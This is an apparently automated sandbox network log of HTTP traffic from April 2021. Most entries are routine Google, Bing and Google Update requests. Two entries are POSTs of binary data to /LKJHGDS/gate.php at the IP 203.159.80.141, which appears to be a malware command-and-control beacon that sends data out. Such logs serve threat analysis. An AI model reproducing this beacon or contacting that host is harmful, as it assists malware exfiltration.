Network Analysis

GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Thu, 01 Apr 2021 00:30:50 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2021-04-01-00; expires=Sat, 01-May-2021 00:30:50 GMT; path=/; domain=.google.com; Secure Set-Cookie: NID=212=OEQC1LCfN9wEavngYMdW3jT1SfMfMq_QEEd1V9q_Z-Pm2xTy_2pHbPJRUJntZiPrm2sWKY4P_N7qnIWgCSGGnazYYQgn3cDYtD1d8A07ZM82WUWAkIpTvwu12Kyyyd1-eNfkFZd5FG41lem9YY6uPRTeuDjE8Somh6mtxYE5ZCo; expires=Fri, 01-Oct-2021 00:30:50 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked

GET / HTTP/1.1 Host: www.bing.com Connection: Keep-Alive

HTTP/1.1 200 OK Cache-Control: private Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Set-Cookie: MUID=3E86F2913265692F1977E29D33F66810; domain=.bing.com; expires=Tue, 26-Apr-2022 00:30:50 GMT; path=/; secure; SameSite=None Set-Cookie: MUIDB=3E86F2913265692F1977E29D33F66810; expires=Tue, 26-Apr-2022 00:30:50 GMT; path=/ Set-Cookie: _EDGE_S=F=1&SID=176897864A2C669138DB878A4BBF670D; domain=.bing.com; path=/ Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 26-Apr-2022 00:30:50 GMT; path=/ Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Sat, 01-Apr-2023 00:30:50 GMT; path=/ Set-Cookie: SRCHUID=V=2&GUID=1E6BEE4E47E1441DAF1324C8BF0439A4&dmnchg=1; domain=.bing.com; expires=Sat, 01-Apr-2023 00:30:50 GMT; path=/ Set-Cookie: SRCHUSR=DOB=20210401; domain=.bing.com; expires=Sat, 01-Apr-2023 00:30:50 GMT; path=/ Set-Cookie: SRCHHPGUSR=SRCHLANGV2=ko; domain=.bing.com; expires=Sat, 01-Apr-2023 00:30:50 GMT; path=/ Set-Cookie: _SS=SID=176897864A2C669138DB878A4BBF670D; domain=.bing.com; path=/ Set-Cookie: ULC=; domain=.bing.com; expires=Wed, 31-Mar-2021 00:30:50 GMT; path=/ Set-Cookie: _HPVN=CS=eyJQbiI6eyJDbiI6MSwiU3QiOjAsIlFzIjowLCJQcm9kIjoiUCJ9LCJTYyI6eyJDbiI6MSwiU3QiOjAsIlFzIjowLCJQcm9kIjoiSCJ9LCJReiI6eyJDbiI6MSwiU3QiOjAsIlFzIjowLCJQcm9kIjoiVCJ9LCJBcCI6dHJ1ZSwiTXV0ZSI6dHJ1ZSwiTGFkIjoiMjAyMS0wNC0wMVQwMDowMDowMFoiLCJJb3RkIjowLCJEZnQiOm51bGwsIk12cyI6MCwiRmx0IjowLCJJbXAiOjF9; domain=.bing.com; expires=Sat, 01-Apr-2023 00:30:50 GMT; path=/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-MSEdge-Ref: Ref A: D976900F8F464C9CB9C4090E7F36C5AE Ref B: SLAEDGE1020 Ref C: 2021-04-01T00:30:50Z Date: Thu, 01 Apr 2021 00:30:50 GMT

POST /service/update2?cup2key=10:1403012316&cup2hreq=66305915241c4634f51031e5bc7c5d4bdf4e8c4f63e65e37b4ec8569d469c62c HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Google Update/1.3.36.32;winhttp;cup-ecdsa X-Old-UID: cnt=0 X-Goog-Update-AppId: {430FD4D0-B729-4F61-AA34-91526481799D},{8A69D345-D564-463C-AFF1-A69D9E530F96} X-Goog-Update-Updater: Omaha-1.3.36.32 X-Goog-Update-Interactivity: bg X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Content-Length: 1202 Host: update.googleapis.com

HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-zu1/DT65NdLvgIX4NwTlnQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 01 Apr 2021 00:32:17 GMT X-Cup-Server-Proof: 30460221008b7d740d314a86645ad2dd50c666e93accbea8034e925630bb99c5140184dce9022100cc1dc480376a6e5a0cbf6a7ae9382a3becfda1a2e4b9a25e1db4a1416406551c:66305915241c4634f51031e5bc7c5d4bdf4e8c4f63e65e37b4ec8569d469c62c Content-Type: text/xml; charset=UTF-8 X-Daynum: 5203 X-Daystart: 63137 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked

POST /LKJHGDS/gate.php HTTP/1.0 Host: 203.159.80.141 Accept: */* Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 3712 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)

HEAD /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: redirector.gvt1.com

HTTP/1.1 302 Found Date: Thu, 01 Apr 2021 00:32:20 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate X-Content-Type-Options: nosniff Location: http://r3---sn-3u-bh26.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=175.208.134.150&mm=28&mn=sn-3u-bh26&ms=nvh&mt=1617236658&mv=m&mvi=3&pcm2cms=yes&pl=18&shardbypass=yes Content-Type: text/html; charset=UTF-8 Server: ClientMapServer Content-Length: 481 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN

HEAD /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=175.208.134.150&mm=28&mn=sn-3u-bh26&ms=nvh&mt=1617236658&mv=m&mvi=3&pcm2cms=yes&pl=18&shardbypass=yes HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: r3---sn-3u-bh26.gvt1.com

HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: public,max-age=86400 Content-Disposition: attachment Content-Length: 1304160 Content-Security-Policy: default-src 'none' Content-Type: application/octet-stream Etag: "8346e1" Server: downloads X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Xss-Protection: 0 Date: Wed, 31 Mar 2021 04:59:43 GMT Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Last-Modified: Fri, 22 Jan 2021 06:31:14 GMT Connection: keep-alive Vary: Origin

POST /LKJHGDS/gate.php HTTP/1.0 Host: 203.159.80.141 Accept: */* Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 3712 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)

GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=175.208.134.150&mm=28&mn=sn-3u-bh26&ms=nvh&mt=1617236658&mv=m&mvi=3&pcm2cms=yes&pl=18&shardbypass=yes HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT Range: bytes=0-6881 User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: r3---sn-3u-bh26.gvt1.com

HTTP/1.1 206 Partial Content Accept-Ranges: bytes Cache-Control: public,max-age=86400 Content-Disposition: attachment Content-Length: 6882 Content-Security-Policy: default-src 'none' Content-Type: application/octet-stream Etag: "8346e1" Server: downloads X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Xss-Protection: 0 Date: Wed, 31 Mar 2021 04:59:43 GMT Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Last-Modified: Fri, 22 Jan 2021 06:31:14 GMT Content-Range: bytes 0-6881/1304160 Connection: keep-alive Vary: Origin